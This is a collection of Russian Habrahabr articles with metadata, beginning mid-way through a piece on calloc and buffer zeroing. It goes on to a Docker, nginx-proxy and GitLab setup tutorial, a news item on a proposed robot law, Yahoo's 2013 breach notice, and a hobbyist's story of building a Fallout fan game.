Этот баг был описан как Radar 29508271 . Один из самых странных багов, что мне встречались. Выводы Многие из вас спросят, безопасно ли так делать? Конечно, CFFI не просто обнуляет буферы: гораздо лучше использовать инициализированную память, чем неинициализированную, особенно при взаимодействии с памятью напрямую из языка программирования, поэтому с обнулением получается гораздо безопаснее. Но в данном случае создаваемый нами массив char немедленно передаётся в OpenSSL, который может писать данные в буфер, и мы сообщаем OpenSSL длину буфера . Это значит, что OpenSSL немедленно перезаписывает поверх наших свежеобнулённых байтов максимальный размер буфера. И когда мы получаем буфер обратно, OpenSSL сообщает нам, сколько байтов он записал. Мы просто копируем эти байты из буфера и выкидываем их. То есть каждый байт в буфере а) мы заполнили нулями, затем его перезаписал OpenSSL, затем мы его выкопировали, или б) мы заполнили нулями и больше никогда не трогали. В любом случае первый шаг (заполнение нулями) необязателен: либо OpenSSL потом сам обнулит, либо мы вообще не будем касаться этих байтов, вне зависимости от хранимых в них значений. Так что в целом используемые подобным образом буферы не нуждаются в обнулении.
Нужно пояснить насчёт «безопасного». Огромное количество C-кода, желающего выделить кучу для массивов, делает вызовы наподобие такого: type *array = malloc(number_of_elements * size_of_element) . Это опасный шаблон, поскольку умножение может привести к переполнению : если результат умножения number_of_elements на size_of_element не поместится в отведённое количество битов, программа может запросить слишком мало данных . calloc предотвращает это с помощью кода, который при умножении проверяет на переполнение. И если результат оказывается слишком большим, то возвращается соответствующая ошибка.
Должен подчеркнуть, что «можно считать» — не синоним «гарантирует». Я не анализировал runtime Go и не проверял этот момент.
Конечно, они могут морить друг друга голодом с точки зрения физической памяти, но это уже другая проблема.
Всё это предполагает, что вы компилируете с выключенными оптимизациями: ведь оптимизатор может просто оптимизировать всю программу!
| https://habrahabr.ru/company/mailru/blog/317476/ |
habrahabr | Docker, GitLab, бесплатные SSL-сертификаты и другие плюшки современной веб-разработки | ['docker', 'ssl сертификаты', 'gitlab', 'centos 7', 'letsencrypt', 'certbot', 'кластеризация', 'lamp', 'lemp', 'mean', 'google cloud'] | И снова здравствуйте! Почти пять лет уже не писал здесь новых статей, хотя, если честно, всегда знал, что рано или поздно начну это делать снова. Не знаю как вам, а мне все таки это дело всегда... | И снова здравствуйте! Почти пять лет уже не писал здесь новых статей, хотя, если честно, всегда знал, что рано или поздно начну это делать снова. Не знаю как вам, а мне все таки это дело всегда казалось довольно увлекательным. Начинать написание нового материала после столь продолжительного отдыха от этого дела — труднее всего. Но раз цель поставлена — надо идти до конца. Начну немного издалека. Всю свою сознательную жизнь основным родом моей деятельности была и остается по сей день веб-разработка. Именно поэтому, сознаюсь сразу, что данный материал стоит воспринимать именно как попытка построения Docker-кластера от системного администратора любителя, но никак не профессионала. В этой статье я не могу претендовать на экспертное мнение в кластеризации и даже, более того, сам же хочу проверить достоверность собственного опыта. Под хабракатом вы найдете Quick Start по использованию Docker на уровне, необходимом для решения конкретных задач, обозначенных ниже, без углубления в "дебри" виртуализации и прочих сопутствующих тем. Если вы до сих пор хотите начать успешно использовать эту современную технологию, тем самым значительно упростив целый ряд процессов: от разработки веб-продуктов и до разворачивания и переноса оных под какое-либо современное оборудование — прошу под кат! Преамбула Начнем, конечно же, с постановки задачи и определения основных технологий/методик, используемых в гайде. С самого начала я заинтерисовался Docker'ом с целью быстрого создания небольшого, но довольно универсального кластера под собственные проекты (рабочие, учебные, etc). Так как системным администрированием я профессионально заниматься не собирался — я решил, что должен обучиться основам кластеризации ровно до того момента, когда я смог бы без особых затруднений разворачивать любой популярный программный стек для веб-проекта. Далее я рассмотрю разворачивание на Docker следующих конфигураций: LAMP ;
LEMP ;
MEAN .
Первые две в представлении, думаю, не нуждаются. Третяя же состоит из MongoDB , Express.js , Node.js . MEAN я чаще всего использовал для написания RESTful API , например, для дальнейшего разрабатывания на его основе мобильного приложения. После этого я сам себе немного усложнил задачу, добавив следующие требования: Возможность без затруднений использовать различные домены (или, зачастую, поддомены) для каждого отдельного контейнера (по принципу виртуальных хостов ).
Использование HTTPS-протокола по-умолчанию. Более того, хотелось бы организовать бесплатное генерирование SSL-сертификатов , не уступающих при этом платным аналогам.
Разворачивание на одном и том же сервере GitLab CE — в качестве основной CVS-системы для работы над проектами не только в одиночку, но и в команде.
Основные определения: Docker — программное обеспечение для автоматизации развёртывания и управления приложениями в среде виртуализации на уровне операционной системы.
Letsencrypt — Бесплатный автоматический центр авторизации (CA). Предоставляет бесплатные сертификаты для включения поддержки HTTPS (SSL / TLS) на любом веб-сайте.
GitLab Community Edition — Open Source аналог GitHub. Обеспечивает управление Git-репозиториями, анализ кода, отслеживание ошибок, работу с каналами активности, создание Wiki и т.д.
Установка и настройка Проблем с установкой Docker и других пакетов не должно возникнуть. На официальном сайте этот процесс расписан довольно подробно. Далее я распишу общий перечень команд, необходимых для начальной настройки. Сразу уточню, что в этой статье я рассматриваю настройку Docker и всех сопутствующих программ на дистрибютиве CentOS 7 , так как на этой ОС я уже давно привык работать, как на основной серверной системе. В целом на любом другом Linux-дистрибютиве действия будут примерно аналогичные, с той лишь разницей, что, например, для Ubuntu вы будете использовать apt-get вместо yum / dnf (для CentOS / Fedora). Docker + Docker Compose: Подготовка: $ sudo yum update $ sudo tee /etc/yum.repos.d/docker.repo <<-'EOF' [dockerrepo] name=Docker Repository baseurl=https://yum.dockerproject.org/repo/main/centos/7/ enabled=1 gpgcheck=1 gpgkey=https://yum.dockerproject.org/gpg EOF Установка Docker Engine : $ sudo yum install docker-engine $ sudo systemctl enable docker.service $ sudo systemctl start docker Создание группы пользователей 'docker' и добавление туда текущего пользователя (это необходимо для того, чтобы работать с Docker без использования 'sudo' или root-доступа): $ sudo groupadd docker $ sudo usermod -aG docker your_username Проверка успешности установки: $ docker run --rm hello-world Установка Docker Compose (утилита для объединения нескольких контейнеров в одно веб-приложение): $ sudo curl -L "https://github.com/docker/compose/releases/download/1.9.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose $ sudo chmod +x /usr/local/bin/docker-compose $ docker-compose --version Certbot ( официальный сайт ): Утилита для автоматического получения/обновления SSL-сертификатов от Letsencrypt : Перед установкой необходимо включить EPEL-репозиторий , если этого не было сделано ранее. $ sudo yum install certbot Основы работы с Docker Engine Базовые принципы: Docker представляет из себя дополнительный уровень абстракции; систему, автоматизирующую виртуализацию на уровне операционной системы . " Виртуализация на уровне операционной системы — метод виртуализации, при котором ядро операционной системы поддерживает несколько изолированных экземпляров пространства пользователя, вместо одного. Эти экземпляры (часто называемые контейнерами или зонами) с точки зрения пользователя полностью идентичны реальному серверу. Ядро обеспечивает полную изолированность контейнеров, поэтому программы из разных контейнеров не могут воздействовать друг на друга."
From Wikipedia Основные преимущества использования Docker: Изолированность отдельных кластеров друг от друга;
Один и тот же Docker-контейнер может работать без изменений на множестве различных машин (с разными конфигурациями);
Docker оптимизирован для развертывания приложений ( application-centric );
Автоматизация сборки приложений;
Повторное использование одних и тех же компонентов;
Open Source реестр готовых контейнеров ( Docker Hub );
Единый API для автоматизации пользовательской настройки контейнера и его разворачивания.
Далее расмотрим основные команды, которые нам понадобятся для создания кластера: $ docker run По сути основная команда, выполняющая запуск нового контейнера. Основные параметры: --name : UUID идентификатор: уникальное имя контейнера;
--volume (-v) : том, связанный с контейнером: задается в форме абсолютного пути к директории;
--env (-e) : переменная окружения: позволяет дополнительного настраивать запускаемый контейнер;
--publish (-p) : настройка определенных портов, необходимых для работы контейнера (например, 80 для http, 443 для https).
$ docker ps Команда, с помощью которой можно получить список запущенных контейнеров. $ docker stop container-name Команда, останавливающая работу контейнера. $ docker rm container-name Удаление определенного контейнера. Внимание : прежде, чем удалить контейнер, его необходимо остановить ( docker stop )! Более подробно разобраться в работе каждой команды вы можете в официальной документации . В этой статье я обратил внимание только на основные команды, необходимые для успешного начала работы с Docker. Конкретные примеры использования docker run вы увидите в этой статье немного далее. Настройка виртуальных хостов Проблема: определенная сложности реализации кластера с использованием виртуальных хостов в различных контейнерах заключается в том, что один порт может "прослушиваться" только одним контейнером (настраивается через --publish). Получается, что по-умолчанию мы можем создать только один контейнер, который будет отвечать на запросы к серверу через порт 80 и/или 443 (http и https протоколы, соответственно). Решение: в принципе, довольно очевидно использовать для решения этой проблемы Reverse Proxy , инкапсулированный в один контейнер, который и будет "прослушивать" порты 80 и 443. Функционал данного контейнера будет заключаться в автоматическом перенаправлении запросов, в соответствии с используемыми виртуальными хостами. Такой контейнер существует в открытом доступе в Docker Hub — nginx-proxy . Кроме решения проблемы с виртуальными хостами, он по-умолчанию поддерживает работу с SSL-сертификатами, что позволяет развернуть поддержку защищенного HTTPS-доступа к сайту. Прежде, чем запустить данный Reverse Proxy контейнер, давайте получим SSL-сертификаты для доменов, которые мы хотим использовать в качестве виртуальных хостов. Получение бесплатного SSL-сертификата Для получения SSL-сертификата будем использовать бесплатный сервис letsencrypt . Для этого на предыдущих этапах мы уже установили утилиту certbot . Я не буду останавливаться на подробностях использования этой утилиты (это все есть в официальной документации ). Приведу лишь готовую команду для автоматического получения бесплатного SSL-сертификата для вашего домена: $ sudo certbot certonly -n -d yourdomain.com --email [email protected] --standalone --noninteractive --agree-tos --standalone --noninteractive --agree-tos — данные параметры необходимы для того, чтобы certbot с одной стороны отработал в фоновом режиме, а с другой — сгенерировал сертификат без конкретной привязки к определенному веб-серверу. В результате успешного выполнения данной команды будут сгенерированы два файла: /etc/letsencrypt/live/yourdomain.com/fullchain.pem /etc/letsencrypt/live/yourdomain.com/privkey.pem Для корректной работы nginx-proxy нам необходимо поместить все файлы сертификатов в одну директорию, при этом используя для каждого доменного имени по два файла в формате: yourdomain.com.crt (файл сертификата) и yourdomain.com.key (приватный ключ). В данном случае логично воспользоваться символьными ссылками. Пример: $ mkdir ssl-certs $ cd ssl-certs $ ln -s /etc/letsencrypt/live/yourdomain.com/fullchain.pem ./yourdomain.com.crt $ ln -s /etc/letsencrypt/live/yourdomain.com/privkey.pem ./yourdomain.com.key На расширение .pem не стоит обращать особого внимания — суть файлов от этого не меняется. Аналогичным образом мы можем получить сертификаты для любых, принадлежащих нам, доменных имен и далее использовать их в качестве виртуальных хостов. Единственное требование заключается в том, что A-записи этих доменных имен должны быть направленны на внешний IP-адрес сервера, на котором вы и выполняете certbot certonly ... Сгенерировав сертификаты для каждого домена, мы готовы к запуску nginx-proxy контейнера. $ docker run -d -p 80:80 -p 443:443 \
-v /full/path/to/ssl-keys:/etc/nginx/certs \
-v /var/run/docker.sock:/tmp/docker.sock:ro \
jwilder/nginx-proxy Рассмотрим эту команду более подробно: -p 80:80 -p 443:443 — привязываем к контейнеру порты 80 и 443. При чем 80-ый порт сервера отвечает 80-ому порту внутри контейнера и аналогично с портом 443. В формате PORT:PORT2 выполняется создание соответствий между реальным портом всей машины и портами внутри отдельного виртуального контейнера.
-v /full/path/to/ssl-keys:/etc/nginx/certs — первый volume, необходимый для настройки данного контейнера. Здесь мы выполняем связь стандартной директории /etc/nginx/certs внутри самого контейнера с директорией, в которую мы вручную поместили символьные ссылки на файлы сертификатов и приватных ключей для наших доменов (на предыдущем этапе).
jwilder/nginx-proxy — идентификатор контейнера внутри Docker Hub. Docker Engine автоматически скачает изображение данного контейнера, если оно еще не было загруженно ранее.
Вот и все — первый контейнер запущен! И этим контейнером является Reverse Proxy , через который мы сможем далее задать любому контейнеру-приложению VIRTUAL_HOST . Примеры работы с различными стеками LAMP Итак, наконец-то мы можем перейти к запуску контейнеров, в которых мы уже сможем разрабатывать наши веб-приложения. В базе Docker Hub довольно много разных вариантов LAMP-контейнеров. Лично я использовал этот: tutum-docker-lamp . Ранее, помимо Docker Engine, мы установили утилиту Docker Compose . И вот только с этого момента мы начинаем ее использовать. Docker Compose удобен для создания приложений, в которых несколько контейнеров объединены и именно совместно представляют собой разрабатываемое приложение. Для того, чтобы запустить этот контейнер в связке с нашим nginx-proxy необходимо: Загрузить в отдельную директорию исходники tutum-docker-lamp (удобнее всего это сделать с помощью git clone );
Создать в этой рабочей директории файл docker-compose.yml с примерно таким содержанием:
web:
build: .
volumes:
- ./www:/var/www/html
environment:
- MYSQL_PASS=yourmysqlpassword
- VIRTUAL_HOST=yourdomain.com Выполнить запуск с помощью docker-compose: $ docker-compose up
Как видите в данном примере, управление виртуальными хостами при использовании nginx-proxy выполняется с помощью всего одной переменной окружения VIRTUAL_HOST . Внимание на связку ./www:/var/www/html . Очевидно, что рабочей директорией вашего сайта становится папка www (ее необходимо создать вручную). Все файлы в этой директории автоматически попадают и в /var/www/html внутри запущеного контейнера. Разобраться более детально с синтаксисом файла настроек docker-compose.yml вы можете в официальной документации . LEMP Запуск LEMP-контейнера принципиально ничем не отличается от примера выше. Сначала находим контейнер в Docker Hub. Например: docker-lemp . Скачиваем исходники контейнера и добавляем docker-compose.yml . Внутри этого файла настроек уже нашего кастомного контейнера вы можете не только задавать переменную окружения VIRTUAL_HOST , но и настраивать всё, что позволяет файл Dockerfile . Например в Dockerfile определено: VOLUME /var/www/ Следовательно вы можете в docker-compose.yml выполнить связку с этим томом примерно так: volumes:
- ./www:/var/www NodeJS + ExpressJS + MongoDB Пример такой конфигурации: docker-nodejs-mongodb-example . Файл docker-compose.yml выглядит следующим образом: web:
build: .
volumes:
- "./api:/src/app"
environment:
- VIRTUAL_HOST=yourdomain.com
links:
- "db:mongo"
db:
image: mongo
ports:
- "27017:27017"
volumes:
- ./data/db:/data/db В данном случае будет создано два связанных контейнера. Один — для базы (mongoDB), второй собственно для NodeJS приложения. Для запуска этой связки контейнеров используется все та же команда docker-compose up . Тонкости в работе с gitlab/gitlab-ce Некоторые, более сложные контейнеры, требуют дополнительной настройки для запуска с использованием nginx-proxy. К таким контейнерам относится и gitlab-ce . Я сначала приведу полностью рабочую версию команды для запуска этого контейнера, с учетом той конфигурации, которая обсуждается в этой статье, а далее поясню ниже некоторые детали из этой команды. Итак: $ docker run --detach \
--hostname gitlab.yourdomain.com \
--publish 2289:22 \
--restart always \
--name custom-gitlab \
--env GITLAB_OMNIBUS_CONFIG="nginx['listen_port'] = 80; nginx['listen_https'] = false; nginx['proxy_set_headers'] = { \"X-Forwarded-Proto\" => \"https\", \"X-Forwarded-Ssl\" => \"on\" }; gitlab_rails['gitlab_shell_ssh_port'] = 2289; external_url 'https://gitlab.yourdomain.com'; gitlab_rails['smtp_enable'] = true; gitlab_rails['smtp_address'] = 'smtp.mailgun.org'; gitlab_rails['smtp_port'] = 2525; gitlab_rails['smtp_authentication'] = 'plain'; gitlab_rails['smtp_enable_starttls_auto'] = true; gitlab_rails['smtp_user_name'] = '[email protected]'; gitlab_rails['smtp_password'] = 'password'; gitlab_rails['smtp_domain'] = 'mg.yourdomain.com';" \
--env VIRTUAL_HOST="gitlab.yourdomain.com" \
--volume /srv/gitlab/config:/etc/gitlab \
--volume /srv/gitlab/logs:/var/log/gitlab \
--volume /srv/gitlab/data:/var/opt/gitlab \
gitlab/gitlab-ce:latest Запуск через NGINX Reverse Proxy + HTTPS Для того, чтобы схема с Reverse Proxy работала в данном случае, необходимо добавить: nginx['listen_port'] = 80;
nginx['listen_https'] = false;
nginx['proxy_set_headers'] = { \"X-Forwarded-Proto\" => \"https\", \"X-Forwarded-Ssl\" => \"on\" }; Причина заключается в том, что nginx-proxy при работе с контейнерами обращается внутри них к порту 80, а не 443. Без дополнительных заголовков в настройке nginx внутри контейнера gitlab-ce ( proxy_set_headers ) запрос проходить не будет (ошибка 502 "Bad Gateway" ). Кроме этого важно добавить: external_url 'https://gitlab.yourdomain.com'; Порт 22 Суть в данных строках: --publish 2289:22 Если работа с рабочей машиной производится через SSH-протокол, то мы не можем создавать связку напрямую "22:22", так как порт 22 уже занят сервисом sshd . Решение этой проблемы описано в официальной документации gitlab-ce. Все просто: мы привязываем любой другой (кроме 22) порт внутри сервера к 22 порту внутри контейнера. В данном примере используется порт 2289. Параллельно с этим важно не забыть добавить gitlab_rails['gitlab_shell_ssh_port'] = 2289; В настройки самого GitLab. Таким образом после запуска gitlab-ce и создания в нем самом какого-либо репозитория работа с ним будет производится по адресу в стиле: ssh://[email protected]:2289/username/repository_name.git Настройка SMTP-сервера Здесь тоже необходимо использовать специальные переменные окружения самого GitLab. В моем случае (я использую Google Cloud Engine ) по-умолчанию закрыты порты 25, 465 (т.е. стандартные порты SMTP-протокола). Одним из вариантов решения этой проблемы является использование стороннего сервиса (как например MailGun ) в качестве SMTP-сервера. Для этого используем настройки: gitlab_rails['smtp_enable'] = true;
gitlab_rails['smtp_address'] = 'smtp.mailgun.org';
gitlab_rails['smtp_port'] = 2525;
gitlab_rails['smtp_authentication'] = 'plain';
gitlab_rails['smtp_enable_starttls_auto'] = true;
gitlab_rails['smtp_user_name'] = '[email protected]';
gitlab_rails['smtp_password'] = 'password';
gitlab_rails['smtp_domain'] = 'mg.yourdomain.com'; Ну и наконец не забываем о --env VIRTUAL_HOST="gitlab.yourdomain.com" \ — переменной окружения для самого nginx-proxy. Вот и все. После выполнения этой инструкции Docker запустит полностью функционирующий контейнер с GitLab CE. Стандартный процесс обновления gitlab-ce Это последний момент, который я хочу отдельно осветить в этом гайде. Процесс обновления GitLab с помощью Docker упрощается до нескольких команд: docker stop custom-gitlab — останавливаем работающий контейнер;
docker rm custom-gitlab — удаляем контейнер GitLab CE. Важный момент: удаление контейнера не означает удаление данных, которые были созданы в процессе использования системы. Поэтому вы можете выполнять эту команду без каких-либо опасений.
docker pull gitlab/gitlab-ce — собственно обновление изображения контейнера;
выполняем длинную команду (пример выше), с помощью которой мы изначально запускали контейнер.
Вот и все. Выполнив эти 4 команды, GitLab автоматически обновится до последний версии и запустится через Docker Engine. Итоги Итак, в результате выполнения этого гайда должен получится Docker-кластер, в основе которого лежит NGINX Reverse Proxy; каждое веб-приложение имеет свой виртуальный хост, который при этом поддерживает защищенный HTTPS-протокол. Вместе с веб-приложениями функционирует GitLab-кластер, полностью настроенный, вплоть до доступа к SMTP-серверу. Я очень надеюсь, что это моё небольшое исследование окажется полезным или, хотя бы, интересным, для многих читателей ХабраХабра. Конечно же, буду рад выслушать критику профессионалов, дополнения или усовершенствования к статье! Спасибо за внимание! | https://habrahabr.ru/post/317636/ |
habrahabr | Сооснователь Mail.ru Group Дмитрий Гришин разработал концепцию закона о правовом статусе роботов | ['робототехника', 'законы робототехники', 'Дмитрий Гришин', 'Айзек Азимов', 'регулирование', 'робомобили'] |
Основатель Grishin Robotics и сооснователь Mail.ru Group Дмитрий Гришин совместно с управляющим партнером санкт-петербургского офиса Dentons и руководителем российской практики в области... |
Основатель Grishin Robotics и сооснователь Mail.ru Group Дмитрий Гришин совместно с управляющим партнером санкт-петербургского офиса Dentons и руководителем российской практики в области интеллектуальной собственности, IT и телекоммуникаций Виктором Наумовым разработал концепцию документа, определяющего правовой статус роботов, сообщают «Ведомости» .
По задумке Наумова и Гришина к роботам стоит применять нормы, используемые для животных и юридических лиц. Согласно концепции Гришина, ИИ в нынешнем его состоянии, за отсутствием эмоций, не может стать субъектом права, но между роботами и животными наблюдается схожесть, так как они могут автономно выполнять определенные действия. При этом к создателям и владельцам роботов могут применяться нормы, используемые сейчас в отношении владельцев источников повышенной опасности. Также допускается создание реестра роботов по аналогии с ЕГРЮЛ.
При этом Дмитрий Гришин не отрицает актуальности законов робототехники , сформированных писателем-фантастом Айзеком Азимовым. В документе предусматривается четыре сценария несения уголовной ответственности владельцем (или создателем) робота, все из которых, в теории, привели к нарушению первого закона робототехники Азимова : конструирование робота-убийцы специально для совершения правонарушения;
отключение программных и аппаратных функций, блокирующих возможность причинения вреда человеку;
конструирование робота, способного причинить вред человеку;
конструирование робота без осознания того, что он может быть использован для причинения вреда человеку.
Гришин уже направил свой проект в ведущие российские юридические институты (Институт государства и права РАН, МГУ и СПбГУ, МГЮА, ВШЭ и т.п.) для получения оценки. Целью своей работы он ставит внесение изменений в ГК РФ и создание отдельного закона «О робототехнике».
У работы сооснователя mail.ru Group есть и практическое применение в ближайшем будущем. Первыми кандидатами на регулирование при принятии проекта Гришина станет активно развивающийся роботизированный транспорт. Именно беспилотные автомобили сейчас идеально вписываются в концепцию «средств повышенной опасности», а проработка вопросов ответственности за действия роботов (робомобилей) поможет подготовить правовую базу для их легального использования.
Президент Cognitive Technologies Ольга Ускова, чья компания занимается разработкой робомобилей для «КАМАЗа» считает, что проект Гришина следует расширить. В первую очередь — отработать стандарты определения уровня интеллектуализации роботов, а также определить модели поведения в экстренных случаях (например, когда жертвы неизбежны).
При этом плотность роботизации в России невероятно низка: если в среднем по миру на 10 000 работников приходится 69 промышленных роботов, то в РФ — всего один. | https://geektimes.ru/post/283726/ |
habrahabr | Yahoo сообщает об утечке пользовательских данных и рекомендует сменить пароли | ['Yahoo', 'утечка личных данных', 'смени пароль!'] | Сегодня утром на почту пришло письмо от Yahoo с важной информацией для пользователей по поводу безопасности. В письме сообщается, что подтверждена утечка пользовательских данных.
Среди данных... | Сегодня утром на почту пришло письмо от Yahoo с важной информацией для пользователей по поводу безопасности. В письме сообщается, что подтверждена утечка пользовательских данных.
Среди данных утекших в сеть могут быть: имена пользователей, адреса электронной почты, номера телефонов, даты рождения, хэши паролей (MD5), а так же в некоторых случаях зашифрованные либо не зашифрованные секретные вопросы и ответы. Среди данных нет паролей в отрытом виде. Так же среди данных нет информации по банковским картам и счетам, считается, что системы хранящие эти данные не были затронуты.
Yahoo рекомендует своим пользователям: Сменить пароли, секретные вопросы и ответы на них для всех учетных записей, где используются похожие данные;
Проверить все свои учетные записи на предмет подозрительной активности;
Так же для отказа от использования паролей в системе Yahoo рекомендуется перейти на использование Yahoo Account Key . Немного подробностей из письма
В ноябре 2016 года были проанализированы данные и подтверждено, что эти данные принадлежат пользователям Yahoo. Дальнейшее изучение данных показало, что утечка произошла в августе 2013 и охватывает большое количество учетных записей. Вторжение, связанное с данным инцидентом не обнаружено, и утверждается, что это не связано с инцидентом раскрытым 22 сентября 2016 года .
Со стороны Yahoo уже проведена следующая работа: Рекомендовали пользователям, чьи учетные записи возможно были затронуты, сменить пароли.
Аннулировали не зашифрованные секретные вопросы и ответы.
Продолжают улучшать безопасность.
Собственно сам текст письма (на английском): Тема: Important Security Information for Yahoo Users
NOTICE OF DATA BREACH
Dear User,
We are writing to inform you about a data security issue that may involve your Yahoo account information. We have taken steps to secure your account and are working closely with law enforcement.
What Happened?
Law enforcement provided Yahoo in November 2016 with data files that a third party claimed was Yahoo user data. We analyzed this data with the assistance of outside forensic experts and found that it appears to be Yahoo user data. Based on further analysis of this data by the forensic experts, we believe an unauthorized third party, in August 2013, stole data associated with a broader set of user accounts, including yours. We have not been able to identify the intrusion associated with this theft. We believe this incident is likely distinct from the incident we disclosed on September 22, 2016.
What Information Was Involved?
The stolen user account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (using MD5) and, in some cases, encrypted or unencrypted security questions and answers. Not all of these data elements may have been present for your account. The investigation indicates that the stolen information did not include passwords in clear text, payment card data, or bank account information. Payment card data and bank account information are not stored in the system we believe was affected.
What We Are Doing
We are taking action to protect our users:
We are requiring potentially affected users to change their passwords.
We invalidated unencrypted security questions and answers so that they cannot be used to access an account.
We continuously enhance our safeguards and systems that detect and prevent unauthorized access to user accounts.
What You Can Do
We encourage you to follow these security recommendations:
Change your passwords and security questions and answers for any other accounts on which you used the same or similar information used for your Yahoo account.
Review all of your accounts for suspicious activity.
Be cautious of any unsolicited communications that ask for your personal information or refer you to a web page asking for personal information.
Avoid clicking on links or downloading attachments from suspicious emails.
Additionally, please consider using Yahoo Account Key, a simple authentication tool that eliminates the need to use a password on Yahoo altogether.
For More Information
For more information about this issue and our security resources, please visit the Yahoo Security Issues FAQs page available at yahoo.com/security-update .
Protecting your information is important to us and we work continuously to strengthen our defenses.
Sincerely,
Bob Lord
Chief Information Security Officer
Yahoo | https://geektimes.ru/post/283728/ |
habrahabr | Как я в одиночку сделал игру и выводы | ['опыт разработки игры', 'gamedev', 'gamedevelopment', 'gamedesign', 'выводы'] | История разработки одной фанатской компьютерной игры Fallout: The X-Project и попытки сделать из неё «конфетку»
Предупрежу сразу, вы не увидите в этой статье каких-то актуальных и современных... | История разработки одной фанатской компьютерной игры Fallout: The X-Project и попытки сделать из неё «конфетку»
Предупрежу сразу, вы не увидите в этой статье каких-то актуальных и современных знаний, да и в целом, я не стану в ней уделять много внимания техническим аспектам.
Объясню почему: сама по себе игра разрабатывалась в период с 1998 по 2008 год, а наиболее активно — где-то с 2004 по 2007. Если честно, то я и в 2005-м понимал, что будущего у игры нет. Но хотел просто её закончить. Иначе зачем столько времени и усилий потратил на проект? К тому же, я был не один, и нельзя допускать, чтобы чужие усилия были потрачены впустую. Ответственность.
Но не будем отходить в сторону. Кому будет полезна статья? В первую очередь таким же ребятам, каким я был сам, учась в институте. Мечтателям, желающим создать свою игру мечты. Начнём благословясь
Хотя нет, эта игра не была той самой «мечтой», конечно же. Но на момент решения о её разработке, я думал, что смогу быстро закончить проект (ага-ага!) и привлечь внимание таких же, как и я. «Надежды юноши питают...»
Конечно, я играл в Fallout. Тот самый, от Black Isle и Interplay, оставшихся теперь лишь в анналах истории. Двумерный, изометрический. С отвратным русским переводом. Но это был взрыв. Крышеснос.
Потому при выборе проекта, я решил использовать именно данную тему. Второй Fallout уже вышел, а про 3-й пока никто даже не заикался (на момент задумки). Игрушка предполагалась фанатской, рассчитанной только на русскоязычных игроков, и не предполагала извлечение прибыли. Только опыта. Коим я здесь и делюсь.
Кстати, позже вышла еще Fallout Tactics, из которой было позаимствовано не мало графики для игры. И звуков. Впрочем, тягалось всё и из обоих оригинальных фоллаутов.
Почему текстовый квест? Опять же, потому что графики требуется по минимуму. Художников не было, никаких бирж фриланса еще не существовало (а то, подозреваю, я бы еще и вложился), и только один 3D-моделлер был найден на gamedev.ru каким-то чудом. Он сделал коротенький intro при начале новой игры. За что ему отдельное спасибо!
И так, некоторый бэкграунд создания игры я обозначил. Поехали дальше! Выбор языка и платформы
На момент начала изучения мной GameDev'а, стандартом в нём был C++. А для C++ IDE — MS Visual Studio. Его я и стал изучать и использовать. Для работы с графикой и медиа — MS DirectX, и его части DirectDraw и DirectSound. С 3D у меня с самого начала не задалось, да и в данном проекте он был совсем не к месту.
Но и сам по себе DirectX не столь удобная штука, потому я нашел библиотечку NukeDX, которая позволяла работать с DX гораздо удобнее (читайте, это как libGDX сейчас для Java). Правда, NukeDX уже на момент начала работы с ним приказал долго жить. Но всё, что я хотел — в нём уже было и работало.
То, что игра будет для настольного ПК на Windows – на тот момент не вызывало никаких сомнений. Ноутбуки стоили гораздо дороже ПК, а о планшетах можно было только почитать в заумных обзорах. Android и смартфоны были только в зародыше, в секретных подвалах лабораторий. А Linux воспринимался исключительно как консольное серверное решение.
Хотя не скрою, году так в 2010-м появилась мыслишка «а не запихнуть ли под Windows Pocket всё это дело»? С названием операционки могу наврать, но суть понятна, думаю.
Идея как появилась, так и пропала — пришлось бы переписывать весь код и переделывать графику. И о скриптах замолвим слово
Поскольку я делал текстовую Role-Playing Game, которая изначально подразумевает нелинейность прохождения (о, это была модная штука тогда!), то надо было как-то заложить возможность манипуляции игровыми данными без перекомпиляции проекта каждый раз. Да и в целом, было крайне интересно попробовать самому прикрутить скриптовый движок к игре.
Скриптовый движок должен был решать следующие задачи: взаимодействие с переменными игры (получение / модификация) и функциями;
не требовать предварительной компиляции кода;
не нагружать игру.
Из всех удовлетворяющих данным требованиям выбор пал на Lua. Почему конкретно он — сейчас уже не вспомню. Язык точно использовался уже в крупных проектах. Да и сейчас используется (насколько я в курсе, в том же WoW, например).
Библиотека свободно распространяемая, примеры были. И я Lua прикрутил. Набираем воздуха в лёгкие и задерживаем дыхание перед прыжком
Всё замечательно, с платформой и инструментарием я определился. Теперь надо подумать, как идею превратить в нечто осязаемое.
Поскольку на тот момент я уже делал какие-то простенькие программки с помощью Microsoft Foundation Classes, то с их же помощью решил написать и сценарный редактор для игры.
Рассудив, что игра состоит из последовательности сцен (в нашем случае описываемых текстом), а переход на следующую сцену зависит от выбора варианта ответа, то я создал следующую структуру сценария:
Как видно на скриншоте, в сцене присутствует, помимо текста описания и вариантов выбора, еще и много других данных. Например, текущая дата (по игровому времени). И смотря на это сейчас, я уже вижу, что следует исправить.
Помимо времени, мы еще отображаем картинку сцены. В редакторе она задаётся номером. А в игре отображается в левом верхнем углу. И спрайт, как вы уже догадались, соответствует данному номеру.
Так же есть название сцены (Location). Воспроизводимый для сцены музыкальный файл. И варианты действий со ссылками на соответствующую сцену.
И вот здесь немного поговорим об интерактивности. Думаю, внимательные читатели заметили поле Event, в котором что-то вписано. Всё верно, это скрипт, выполняемый при переходе на данный экран. На первом экране это всего лишь добавление в журнал игрока новых задач: AddQuest(1, "Вспомнить собственное имя, или, хотя бы кличку");
AddQuest(1, "Найти доктора");
С точки зрения программы мы вызываем в Lua доступные ей функции приложения с теми параметрами, которые нам нужны.
А теперь еще два момента:
1) У каждого варианта ответа есть поле Condition. Через тот же Lua мы можем проверить какие-то игровые переменные, и на основе этой проверки либо выводить вариант ответа, либо его скрыть.
2) Каждый вариант ответа может иметь свой выполняемый скрипт. То есть, если мы выбираем какой-то вариант, то он может повлечь за собой определённое действие. Например, вызов экрана боя. Или проигрывание звука. Или переход на какой-то конкретный экран, если выполняется условие. И т.п.
Вот такими нехитрыми способами я решал вопрос интерактивности и взаимодействия пользователя с миром игры.
А хранится всё в файле scenario.dat, в структуре данных. Сохраняется на диск с помощью механизма сериализации того же MFC. Ну и прикола ради, во время сохранения кодируется. Ныряем
Хорошо, не очень удобный, но хоть как-то работающий редактор сценариев я сделал. Теперь пора запустить игру.
И вот тут… Да как бы не так! Тут было много муторной работы в Photoshop с выцепленной графикой. Но с точки зрения программирования ничего особо сложного не было. На первый взгляд.
